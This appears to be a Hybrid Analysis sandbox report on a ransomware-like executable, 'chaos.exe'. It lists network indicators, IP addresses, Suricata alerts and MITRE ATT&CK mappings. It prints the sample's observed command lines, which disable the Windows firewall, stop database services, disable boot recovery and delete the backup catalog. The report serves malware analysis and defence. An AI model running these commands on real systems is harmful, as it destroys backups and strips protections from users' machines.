chaos.exe
This report is generated from a file or URL submitted to this webservice on April 12th 2020 20:56:18 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware
-
Found a string that may be used as part of an injection method
POSTs files to a webserver - Persistence
-
Modifies firewall settings
Spawns a lot of processes
Tries to suppress failures during boot (often used to hide system changes) - Evasive
-
Possibly tries to implement anti-virtualization techniques
The input sample contains a known anti-VM trick - Network Behavior
- Contacts 2 domains and 3 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 8
-
Anti-Detection/Stealthyness
-
Tries to suppress failures during boot (often used to hide system changes)
- details
- Tries to suppress failures during boot "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" (Show Process)
- source
- Monitored Target
- relevance
- 8/10
-
Tries to suppress failures during boot (often used to hide system changes)
-
Environment Awareness
-
The input sample contains a known anti-VM trick
- details
- Found VM detection artifact "CPUID trick" in "0b032586772c4b52ca2712d92f5a13b26051ef72a8bcdd70c98eb9faffa22425.bin" (Offset: 417187)
- source
- Binary File
- relevance
- 5/10
- ATT&CK ID
- T1497 (Show technique in the MITRE ATT&CK™ matrix)
-
The input sample contains a known anti-VM trick
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ETPRO HUNTING Suspicious Terse HTTP Request to Pastebin" (SID: 2811838, Rev: 6, Severity: 1) categorized as "A Network Trojan was detected"
Detected alert "ET USER_AGENTS SFML User-Agent (libsfml-network) " (SID: 2026914, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected"
Detected alert "ETPRO MALWARE Zeropadypt/Limbo/Ouroboros Ransomware CnC Checkin M4" (SID: 2839873, Rev: 2, Severity: 1) categorized as "Malware Command and Control Activity Detected" (PUA/PUP/Adware) - source
- Suricata Alerts
- relevance
- 10/10
-
Detected Suricata Alert
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "148.251.247.174": ...
URL: https://www.sfml-dev.org/documentation/2.3.1/classsf_1_1Keyboard.php (AV positives: 2/77 scanned on 04/08/2020 20:55:26)
URL: http://www.sfml-dev.org/ (AV positives: 2/77 scanned on 04/08/2020 09:06:28)
URL: http://sfml-dev.org/ (AV positives: 1/77 scanned on 04/08/2020 09:01:59)
URL: https://www.sfml-dev.org/files/SFML-2.5.1-macOS-clang.tar.gz (AV positives: 1/71 scanned on 03/16/2020 09:16:09)
URL: https://www.sfml-dev.org/learn.php (AV positives: 2/71 scanned on 03/11/2020 21:00:20)
File SHA256: 26690dae115f47a1e0167750209a30cc68f51c5090e3b908105c93967e5156fa (Date: 04/11/2020 22:57:50)
File SHA256: c4018b6e9dd769a8f0da65d09d5f955438e6c5ad7e40e4bc408ca2e60e4c4564 (Date: 04/10/2020 08:41:51)
File SHA256: e1fd9542da139a0071b425c11ef0ed094a996e6bc8366362f3d5fe7e200c879d (Date: 04/09/2020 02:10:50)
File SHA256: 751281b30f77a60252ff7547863ffa14d028ebce141c2b50a8d979feeee35a7e (Date: 04/05/2020 20:33:51)
File SHA256: 01a6be0b7133c34bb31c33dbcf6e742c1866461e9229a2dc1e87d4f6eec5b2e1 (Date: 04/02/2020 18:24:56)
File SHA256: 8ba04f6fde6a7b42527d69742c49da2ac529354f71f553409f9f821d618de4b6 (AV positives: 1/61 scanned on 09/12/2018 11:03:57)
File SHA256: 94c7beb5903d412cdb1ea2ee424c293f051e47d4df9cb511869e533c95ac7644 (AV positives: 1/62 scanned on 07/31/2018 04:20:07)
File SHA256: ad50ded8aa8938373f853a4f3f43d3f4f496bb185df95cda86b10cb7851840b6 (AV positives: 14/62 scanned on 06/04/2018 20:13:28)
File SHA256: d12ba466eb20de3b34dddf73741e80f4d37b6aa0de05d1aa713dd27dbc80c46b (AV positives: 1/61 scanned on 02/13/2018 12:52:38)
File SHA256: c341c3d42655ffb4d1fbff153999ba17262786bd13b404a038f0bfe1f8ec85d9 (AV positives: 1/61 scanned on 01/29/2018 06:59:38)
Found malicious artifacts related to "104.23.98.190": ...
URL: https://pastebin.com/raw/ieQmRJtg (AV positives: 2/77 scanned on 04/12/2020 21:02:27)
URL: https://pastebin.com/raw/0hNR8dnd (AV positives: 6/77 scanned on 04/12/2020 21:01:25)
URL: https://pastebin.com/raw/Ww2WR8um (AV positives: 2/77 scanned on 04/12/2020 21:00:17)
URL: http://pastebin.com/raw.php?i=2Atf7qcq (AV positives: 1/77 scanned on 04/12/2020 20:30:41)
URL: https://pastebin.com/raw/Upc4PVcR (AV positives: 1/77 scanned on 04/12/2020 20:27:30)
File SHA256: 3eaf40d4ef074890c407b9f987a818ac3fd0c064784bac2474c9f0d144a1328b (Date: 04/12/2020 19:35:47)
File SHA256: 1e4777f9a083ea7cf31e7c5a8f4530e1459d5693b9265dd33e5ed17465c77334 (Date: 04/12/2020 19:26:54)
File SHA256: 0e8499e14c420d827d17908d65eadbf3da21b199a4c94c5b65d52b2fd961afd3 (Date: 04/12/2020 19:12:54)
File SHA256: 17eae82e6916ed9062ece69e59e7e3cc6d03434acae10c74e1feb67342b959e5 (Date: 04/12/2020 19:07:29)
File SHA256: fb82624e7971545dcc430b7ea079a5efc2fdfdb963c35c78c5be38f3ce3daaae (Date: 04/12/2020 19:01:04)
File SHA256: 4c803202c947798bb50c47adb6d9bb473a77093ba9a1a61403803bab74d1ea99 (AV positives: 18/75 scanned on 04/10/2020 16:25:03)
File SHA256: 5aa119e439a9c62cd5334df2a0c24fa853733ff78668616f3c34e3ebad4ab541 (AV positives: 6/75 scanned on 04/10/2020 07:34:34)
File SHA256: 63f455cbdea895e7e4118372ce27bb78f147aaf46d6dd1e53c4497f0825922ec (AV positives: 16/74 scanned on 04/10/2020 11:35:02)
File SHA256: baa5896703fb97e96e88922f0f67d2eb57056436781f8d127b5f890e314818c2 (AV positives: 5/75 scanned on 04/09/2020 16:14:14)
File SHA256: ac4ccdad94cd207f054c8134325736e07a314eea570357315f60e34a058691bd (AV positives: 31/74 scanned on 04/09/2020 06:30:23) - source
- Network Traffic
- relevance
- 10/10
-
Multiple malicious artifacts seen in the context of different hosts
- details
-
Found malicious artifacts related to "148.251.247.174": ...
URL: https://www.sfml-dev.org/documentation/2.3.1/classsf_1_1Keyboard.php (AV positives: 2/77 scanned on 04/08/2020 20:55:26)
URL: http://www.sfml-dev.org/ (AV positives: 2/77 scanned on 04/08/2020 09:06:28)
URL: http://sfml-dev.org/ (AV positives: 1/77 scanned on 04/08/2020 09:01:59)
URL: https://www.sfml-dev.org/files/SFML-2.5.1-macOS-clang.tar.gz (AV positives: 1/71 scanned on 03/16/2020 09:16:09)
URL: https://www.sfml-dev.org/learn.php (AV positives: 2/71 scanned on 03/11/2020 21:00:20)
File SHA256: 26690dae115f47a1e0167750209a30cc68f51c5090e3b908105c93967e5156fa (Date: 04/11/2020 22:57:50)
File SHA256: c4018b6e9dd769a8f0da65d09d5f955438e6c5ad7e40e4bc408ca2e60e4c4564 (Date: 04/10/2020 08:41:51)
File SHA256: e1fd9542da139a0071b425c11ef0ed094a996e6bc8366362f3d5fe7e200c879d (Date: 04/09/2020 02:10:50)
File SHA256: 751281b30f77a60252ff7547863ffa14d028ebce141c2b50a8d979feeee35a7e (Date: 04/05/2020 20:33:51)
File SHA256: 01a6be0b7133c34bb31c33dbcf6e742c1866461e9229a2dc1e87d4f6eec5b2e1 (Date: 04/02/2020 18:24:56)
File SHA256: 8ba04f6fde6a7b42527d69742c49da2ac529354f71f553409f9f821d618de4b6 (AV positives: 1/61 scanned on 09/12/2018 11:03:57)
File SHA256: 94c7beb5903d412cdb1ea2ee424c293f051e47d4df9cb511869e533c95ac7644 (AV positives: 1/62 scanned on 07/31/2018 04:20:07)
File SHA256: ad50ded8aa8938373f853a4f3f43d3f4f496bb185df95cda86b10cb7851840b6 (AV positives: 14/62 scanned on 06/04/2018 20:13:28)
File SHA256: d12ba466eb20de3b34dddf73741e80f4d37b6aa0de05d1aa713dd27dbc80c46b (AV positives: 1/61 scanned on 02/13/2018 12:52:38)
File SHA256: c341c3d42655ffb4d1fbff153999ba17262786bd13b404a038f0bfe1f8ec85d9 (AV positives: 1/61 scanned on 01/29/2018 06:59:38)
Found malicious artifacts related to "104.23.98.190": ...
URL: https://pastebin.com/raw/ieQmRJtg (AV positives: 2/77 scanned on 04/12/2020 21:02:27)
URL: https://pastebin.com/raw/0hNR8dnd (AV positives: 6/77 scanned on 04/12/2020 21:01:25)
URL: https://pastebin.com/raw/Ww2WR8um (AV positives: 2/77 scanned on 04/12/2020 21:00:17)
URL: http://pastebin.com/raw.php?i=2Atf7qcq (AV positives: 1/77 scanned on 04/12/2020 20:30:41)
URL: https://pastebin.com/raw/Upc4PVcR (AV positives: 1/77 scanned on 04/12/2020 20:27:30)
File SHA256: 3eaf40d4ef074890c407b9f987a818ac3fd0c064784bac2474c9f0d144a1328b (Date: 04/12/2020 19:35:47)
File SHA256: 1e4777f9a083ea7cf31e7c5a8f4530e1459d5693b9265dd33e5ed17465c77334 (Date: 04/12/2020 19:26:54)
File SHA256: 0e8499e14c420d827d17908d65eadbf3da21b199a4c94c5b65d52b2fd961afd3 (Date: 04/12/2020 19:12:54)
File SHA256: 17eae82e6916ed9062ece69e59e7e3cc6d03434acae10c74e1feb67342b959e5 (Date: 04/12/2020 19:07:29)
File SHA256: fb82624e7971545dcc430b7ea079a5efc2fdfdb963c35c78c5be38f3ce3daaae (Date: 04/12/2020 19:01:04)
File SHA256: 4c803202c947798bb50c47adb6d9bb473a77093ba9a1a61403803bab74d1ea99 (AV positives: 18/75 scanned on 04/10/2020 16:25:03)
File SHA256: 5aa119e439a9c62cd5334df2a0c24fa853733ff78668616f3c34e3ebad4ab541 (AV positives: 6/75 scanned on 04/10/2020 07:34:34)
File SHA256: 63f455cbdea895e7e4118372ce27bb78f147aaf46d6dd1e53c4497f0825922ec (AV positives: 16/74 scanned on 04/10/2020 11:35:02)
File SHA256: baa5896703fb97e96e88922f0f67d2eb57056436781f8d127b5f890e314818c2 (AV positives: 5/75 scanned on 04/09/2020 16:14:14)
File SHA256: ac4ccdad94cd207f054c8134325736e07a314eea570357315f60e34a058691bd (AV positives: 31/74 scanned on 04/09/2020 06:30:23) - source
- Network Traffic
- relevance
- 10/10
-
Uses network protocols on unusual ports
- details
- TCP traffic to 80.82.69.109 on port 8080
- source
- Network Traffic
- relevance
- 7/10
- ATT&CK ID
- T1065 (Show technique in the MITRE ATT&CK™ matrix)
-
Malicious artifacts seen in the context of a contacted host
-
System Security
-
Modifies firewall settings
- details
-
Process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off" (Show Process)
Process "netsh.exe" with commandline "netsh firewall set opmode mode=disable" (Show Process) - source
- Monitored Target
- relevance
- 8/10
- ATT&CK ID
- T1089 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies firewall settings
-
Unusual Characteristics
-
Spawns a lot of processes
- details
-
Spawned process "chaos.exe" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLWriter" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLWriter" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLBrowser" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLBrowser" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLBrowser" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQL$CONTOSO1" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQL$CONTOSO1" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC" (Show Process)
Spawned process "net.exe" with commandline "net stop MSDTC" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLSERVERAGENT" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop vds" (Show Process)
Spawned process "net.exe" with commandline "net stop vds" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop vds" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off" (Show Process)
Spawned process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable" (Show Process)
Spawned process "netsh.exe" with commandline "netsh firewall set opmode mode=disable" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Spawns a lot of processes
-
Suspicious Indicators 14
-
Environment Awareness
-
Possibly tries to implement anti-virtualization techniques
- details
- ";r;s99t3Qua3@uES^`F`yj$_F\d|9~duFd9uFdu9uFdd9uFdS9uFdB9uFd19uFd 9uFd9uFdvdjY~dqaY^`[3_^]UQQEMUS]VuW3;tuE Ej"Xf9u3j"Xtffftuf;Etf;Eut3fB}3]f9f;Etf;Euf9tuEuj\EXCf9tj"Xf9j\Xu;u%tj"_f9y}u" (Indicator: "qemu")
- source
- File/Memory
- relevance
- 4/10
- ATT&CK ID
- T1497 (Show technique in the MITRE ATT&CK™ matrix)
-
Possibly tries to implement anti-virtualization techniques
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ETPRO POLICY External IP Address Lookup via libsfml-network" (SID: 2838021, Rev: 1, Severity: 2) categorized as "Device Retrieving External IP Address Detected"
Detected alert "ETPRO INFO HTTP Request with Lowercase connection Header Observed" (SID: 2838131, Rev: 1, Severity: 2) categorized as "Potentially Bad Traffic" - source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
-
1/77 reputation engines marked "http://sfml-dev.org" as malicious (1% detection rate)
1/77 reputation engines marked "http://pastebin.com" as malicious (1% detection rate)
2/77 reputation engines marked "http://www.sfml-dev.org" as malicious (2% detection rate) - source
- External System
- relevance
- 10/10
-
Detected Suricata Alert
-
General
-
POSTs files to a webserver
- details
-
"POST /1614CEEEC50A9336EBF690886CAA747D6811C45D37086A3FA7B11C9E83926C6C HTTP/1.1
connection: close
content-length: 1720
content-type: application/x-www-form-urlencoded
from: me
host: 80.82.69.109
user-agent: libsfml-network/2.x" with no payload - source
- Network Traffic
- relevance
- 5/10
-
POSTs files to a webserver
-
Installation/Persistance
-
Found a string that may be used as part of an injection method
- details
-
";D/;DW;D|;D;D;D;D;D<DF<Da<D<D<D<DU{D8jDjD7D)@@@7DD8D.sDz7DX7D3D(DD=D4=D<DDDDtotal progress passed: progress over limitGlobal\ARM Update MutexARM update mutex createdNo file objects in SessionCould not find and validate file: File to be added to install object: FileList in Single Install: Unknown file type in file objectNo Installs initializedUnknown install type in ExecuteInstalls() - will skipInstall_Exit_CodeInstallation returned ERROR_SUCCESSInstallation returned ERROR_SUCCESS_REBOOT_REQUIREDReboot_RequiredInstallation returned error code: Last MSI action name: Last_Msi_Action_NameInstallProductExe... file - args - GetExitCodeProcess failed with exit code: InstallProduct7...IDS_ACTION_EXTRACTINGWebMsiPath/ARMExitCodeSOFTWARE\Adobe\Setup\ReaderErrorTextError text not registeredLogTimeExit code not registered or does not matchExtract installer failedRegistered extracted web installer path in HKLM: Registered extracted web installer path in HKCU: Failed to read registered extracted web installer pathsetupexeValidate file failed: entered msi type installationDISABLE_CACHE DISABLE_CACHE="1"wait for DummyProgressProc thread to exit failedInstallProductMsi...InstallProductMsp...InstallProductEsd...Will launch valid: Invalid empty argumentsInvalid empty ESD argumentsInvalid empty Setup.exe argumentsInvalid argumentsSHGetFolderPath failed\Adobe\Setup\The r_s function failed!/d /d "_x64setup.exeProductCodefailed to get ProductCode from failed to open database: file not valid: failed to lock file: failed to process Extract Dir: will not move
directory already exists: MoveFile failed: ExecuteRetryInstall....exeNot supported file typeJA\JAAdobe Systems
IncorporatedValidate failed - CN1.3.6.1.4.1.311.2.1.121.2.840.113549.1.9.61.3.6.1.4.1.311.3.3.1Cert validation failed - ID: Hash algorithm validation failed: Hash encryption algorithm validation failed: 1.2.840.1135491.2.840.113549.11.2.840.113549.21.2.840.113549.31.2.840.113549.1.11.2.840.113549.1.21.2.840.113549.1.31.2.840.113549.1.41.2.840.113549.1.51.2.840.113549.1.61.2.840.113549.1.71.2.840.113549.1.81.2.840.113549.1.91.2.840.113549.1.101.2.840.113549.1.121.2.840.113549.1.1.11.2.840.113549.1.1.21.2.840.113549.1.1.31.2.840.113549.1.1.41.2.840.113549.1.1.51.2.840.113549.1.1.61.2.840.113549.1.1.71.2.840.113549.1.1.81.2.840.113549.1.1.91.2.840.113549.1.1.101.2.840.113549.1.1.111.2.840.113549.1.1.121.2.840.113549.1.1.131.2.840.113549.1.3.11.2.840.113549.1.7.11.2.840.113549.1.7.21.2.840.113549.1.7.31.2.840.113549.1.7.41.2.840.113549.1.7.51.2.840.113549.1.7.61.2.840.113549.1.9.11.2.840.113549.1.9.21.2.840.113549.1.9.31.2.840.113549.1.9.41.2.840.113549.1.9.51.2.840.113549.1.9.71.2.840.113549.1.9.81.2.840.113549.1.9.91.2.840.113549.1.9.141.2.840.113549.1.9.151.2.840.113549.1.9.15.11.2.840.113549.1.9.16.31.2.840.113549.1.9.16.3.51.2.840.113549.1.9.16.3.61.2.840.113549.1.9.16.3.71.2.840.113549.2.21.2.840.113549.2.41.2.840.113549.2.51.2.840.113549.3.21.2.840.113549.3.41.2.840.113549.3.71.2.840.113549.3.91.2.840.100461.2.840.10046.2.11.2.840.100401.2.840.10040.4.11.2.840.10040.4.31.2.840.10045.2.11.2.840.10045.3.1.71.3.132.0.341.3.132.0.351.2.840.10045.4.11.2.840.10045.4.31.2.840.10045.4.3.21.2.840.10045.4.3.31.2.840.10045.4.3.42.16.840.1.101.3.4.1.22.16.840.1.101.3.4.1.422.16.840.1.101.3.4.1.52.16.840.1.101.3.4.1.252.16.840.1.101.3.4.1.451.3.133.16.840.63.0.21.3.132.1.11.11.3.132.1.11.21.3.14.3.2.131.3.14.3.2.151.3.14.3.2.181.3.14.3.2.211.3.14.3.2.231.3.14.3.2.241.3.14.3.2.251.3.14.3.2.261.3.14.3.2.271.3.14.3.2.281.3.14.3.2.291.3.14.7.2.21.3.14.7.2.3.12.16.840.1.101.3.4.2.12.16.840.1.101.3.4.2.22.16.840.1.101.3.4.2.32.5.8.2InitUpdateData...MsiOpenDatabase(): Manifest file not validFailed to lock Manifest file: InitUpdateFromProductUpdatesTable...SELECT * FROM `ProductUpdates` WHERE `ProductCode`='' AND `ProductVersion`=''MDOVMVEMVFInitUpdateFromProductUpdatesExTable...SELECT * FROM `ProductUpdatesEx` WHERE `ProductCode`='InitUpdateDataFromRecord...File list in Manifest: ProcessArmUpdateManifest...EnforceFailureOfArmUpdateEnforceFailureOfArmUpdate is setFailed to lock Manifest file.ProcessOnDemandManifest...SELECT * FROM `OnDemand` WHERE `OnDemandID`='Empty FileSequences dataEmpty product nameAdobe ApplicationSkipArmOnDemandUACSkipArmOnDemandUAC set in ManifestUrlFallbackUrlFallback: MODB: Manifest file not valid Failed to lock Manifest file InitArmUpdate...SELECT * FROM `ArmUpdate`DisableArmUpdateARM update record foundMGRS(File Name)MGRS(Arm Version)MGRS(Type)MGRS(URL)MGRS(Args)Error in ARM Update dataAdding ARM update object: ARM version - type - url - BlacklistARM Update Blacklist: Newer version ARM update is not availableInitUpdateFiles...SELECT `UpdateID`
`Type`
`URL`
`Size`
`Args`
`AllowNotElevatedInstall` FROM `UpdateFiles` WHERE `File`=''MGRS(UpdateID)Empty UpdateIDEmpty TypeEmpty URLMRGI(Size)New file object: get update values for Update ID: SELECT * FROM `Update` WHERE `UpdateID`='MGRS(MoreInfoURL)InitExtraManifestProperties...NoLongerSupportedNoLongerSupported is set in ManifestReportReport: AllowedLogsessionDllVersionsAllowedLogsessionDllVersions: InitManifestProperties...WaitMsiMutexLimitWaitMsiMutexLimit not set in ManifestWaitMsiMutexLimit: InstallTimeMaxInstallTimeMax: PreventAppLaunchMaxPreventAppLaunchMax: ErrorDetailsURLErrorDetailsURL: WhatsNewURLWhatsNewURL: UpgradeNameUpgradeName: UpgradeDisplayNameAdobe Acrobat Reader DCUpgradeDisplayName not found in Manifest, will use UpgradeDisplayName: WaitDynamicFilesInUseWaitDynamicFilesInUse: AllowCancelBITsJobsAllowCancelBITsJobs: AllowUpdateInSystemContextAllowUpdateInSystemContext: CloseApplicationsCloseApplications: AllowServiceConditionsFound AllowServiceConditions: AllowServiceModeAllowServiceMode: Service allowed in all modesService allowed in full auto mode onlyService not allowed - unknown AllowServiceMode value or not full auto mode for property valueBlacklist: BlacklistExceptionsBlacklistExceptions: InitFilesInUse...SELECT * FROM `AppsInUseEx`MGRS(Condition)MGRS(ModuleName)MGRS(ModulePath)WaitFilesInUseinfo: WaitFilesInUse is not set in ManifestInitUpgrade...Upgrade disabled, returning: Upgrade data not available: Upgrade IDSELECT * FROM `UpgradeEx` WHERE `Upgrade`=': URL: Upgrade MatchUpgradeName from product manifest: InitUpgradeData...PingVersionsPingVersions: DisableUpgradeDataUpgrade pings disabled by manifestDisableUpgradeManifestDownloadedPingupgrademanifestdownloadedupgrademanifestdownloaded ping disabled by manifestupgradedisabledUpgradeCheckIntervalNo upgrade in ManifestMsiOpenDatabaseUpgrade Manifest validation failedFailed to lock Upgrade ManifestCheckUpgradeConditions...UpgradeConditionsOneMustBeMetFound UpgradeConditionsOneMustBeMet: MinOSMinMemoryMinSPMaxOSUpgradeConditionsAllMustBeMetFound UpgradeConditionsAllMustBeMet: InitAutoUpgradeStatus...AutoUpgradeEmpty or null AutoUpgrade propertyFound AutoUpgrade property: AutoUpgradeDaysNLSDisableAutoUpgradeConditionsFound DisableAutoUpgradeConditions property: autoupgradedisabledSELECT `FileSequences` FROM `ProductUpgrades` WHERE `UpgradeMatch`='EvaluateUpdateForInstall...: SELECT * FROM `UpdateConditions` WHERE `UpdateID`='SkipInstallEvaluateCondition...: SELECT * FROM `Conditions` WHERE `Condition`='MGRS(sKey)Empty KeyPATCH_GUIDARM_ELEVATEDUSER_ADMINCondition metTRANSFORMEDMGRS(sName)FILEREG_STRREG_DWORDOSMSI_PRODUCTDATEPLUGINS_COUNTNot supported condition type in ManifestProcessOSCondition...ProcessRegCondition...Invalid Key valueNot supported registry rootvalue does not existProcessFileCondition...File: File foundFile not foundMsiGetFileVersion failedFile version: metnot metCondition IsPatchInstalled...: Patch installedERROR_BAD_CONFIGURATION in MsiEnumPatchesERROR_INVALID_PARAMETER in MsiEnumPatchesUnexpected error in MsiEnumPatchesProcessMsiProductCondition...NAVersionStringCould not get INSTALLPROPERTY_VERSIONSTRING for Product: ProcessDateCondition...Condition not met - invalid Min Date: Condition not met - invalid Max Date: ProcessPluginsCountCondition....apiTransformsJBHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CLASSES_ROOTZBbBtBuDkIExitMaximize&Click to activateShell_NotifyIcon failedShell_TrayWndTrayNotifyWnd" (Taskbar window class may be used to inject into explorer with the SetWindowLong method) - source
- File/Memory
- relevance
- 4/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Found a string that may be used as part of an injection method
-
Network Related
-
Found potential IP address in binary/memory
- details
-
"255.255.255.255"
"80.82.69.52"
"148.251.247.174"
"104.23.98.190"
"80.82.69.109" - source
- File/Memory
- relevance
- 3/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 148.251.247.174 on port 80 is sent without HTTP header
TCP traffic to 104.23.98.190 on port 80 is sent without HTTP header
TCP traffic to 80.82.69.109 on port 8080 is sent without HTTP header - source
- Network Traffic
- relevance
- 5/10
- ATT&CK ID
- T1043 (Show technique in the MITRE ATT&CK™ matrix)
-
Found potential IP address in binary/memory
-
Ransomware/Banking
-
The input sample dropped very many files
- details
- The input sample dropped 1069 files (often an indicator for ransomware)
- source
- Binary File
- relevance
- 5/10
-
The input sample dropped very many files
-
System Security
-
Stops a system service using net.exe
- details
-
Process "net.exe" with commandline "net stop SQLWriter" (Show Process)
Process "net.exe" with commandline "net stop SQLBrowser" (Service: "Computer Browser", UID: 00010714-00003564)
Process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Process "net.exe" with commandline "net stop MSSQL$CONTOSO1" (Show Process)
Process "net.exe" with commandline "net stop MSDTC" (Service: "Distributed Transaction Coordinator", UID: 00010787-00003156)
Process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process)
Process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Process "net.exe" with commandline "net stop vds" (Service: "Virtual Disk", UID: 00010912-00003984) - source
- Monitored Target
- relevance
- 10/10
-
Stops a system service using net.exe
-
Unusual Characteristics
-
Imports suspicious APIs
- details
-
GetDriveTypeA
FindFirstFileW
UnhandledExceptionFilter
WriteFile
GetModuleFileNameW
IsDebuggerPresent
GetModuleFileNameA
LoadLibraryExW
CreateThread
ExitThread
TerminateProcess
GetModuleHandleExW
CreateToolhelp32Snapshot
Process32First
LoadLibraryW
GetVersionExW
GetTickCount
VirtualProtect
Process32Next
OpenProcess
GetStartupInfoW
CreateDirectoryW
DeleteFileW
FindFirstFileExA
FindNextFileW
FindNextFileA
FindFirstFileExW
GetProcAddress
CreateFileW
GetCommandLineW
GetCommandLineA
GetModuleHandleA
GetModuleHandleW
GetFileAttributesExW
CreateProcessA
Sleep
VirtualAlloc
socket
recv
send
WSAStartup
connect
closesocket - source
- Static Parser
- relevance
- 1/10
-
Installs hooks/patches the running process
- details
-
"chaos.exe" wrote bytes "711128017a3b2701ab8b02007f950200fc8c0200729602006cc805001ecd24017d262401" to virtual address "0x761F07E4" (part of module "USER32.DLL")
"chaos.exe" wrote bytes "c0df41771cf94077ccf840770d64427700000000c011277500000000fc3e277500000000e0132775000000009457427625e04177c6e0417700000000bc6a417600000000cf3127750000000093194276000000002c32277500000000" to virtual address "0x76F81000" (part of module "NSI.DLL")
"chaos.exe" wrote bytes "0efc447781ed4377ae864277c6e04177effd44772d164377c0fc4077da8f4b7760144577478d4277a8e241776089427700000000ad37b7768b2db776b641b77600000000" to virtual address "0x721D1000" (part of module "WSHIP6.DLL")
"chaos.exe" wrote bytes "7d07457781ed4377ae864277c6e04177effd44772d16437760144577478d4277a8e241776089427700000000ad37b7768b2db776b641b77600000000" to virtual address "0x721C1000" (part of module "WSHTCPIP.DLL")
"cmd.exe" wrote bytes "711128017a3b2701ab8b02007f950200fc8c0200729602006cc805001ecd24017d262401" to virtual address "0x761F07E4" (part of module "USER32.DLL")
"net.exe" wrote bytes "c0df41771cf94077ccf840770d64427700000000c011277500000000fc3e277500000000e0132775000000009457427625e04177c6e0417700000000bc6a417600000000cf3127750000000093194276000000002c32277500000000" to virtual address "0x76F81000" (part of module "NSI.DLL")
"net1.exe" wrote bytes "c0df41771cf94077ccf840770d64427700000000c011277500000000fc3e277500000000e0132775000000009457427625e04177c6e0417700000000bc6a417600000000cf3127750000000093194276000000002c32277500000000" to virtual address "0x76F81000" (part of module "NSI.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Imports suspicious APIs
-
Hiding 3 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 19
-
Environment Awareness
-
Reads the active computer name
- details
-
"net1.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
"netsh.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME") - source
- Registry Access
- relevance
- 5/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the cryptographic machine GUID
- details
- "netsh.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1012 (Show technique in the MITRE ATT&CK™ matrix)
-
Reads the active computer name
-
General
-
Contacts domains
- details
-
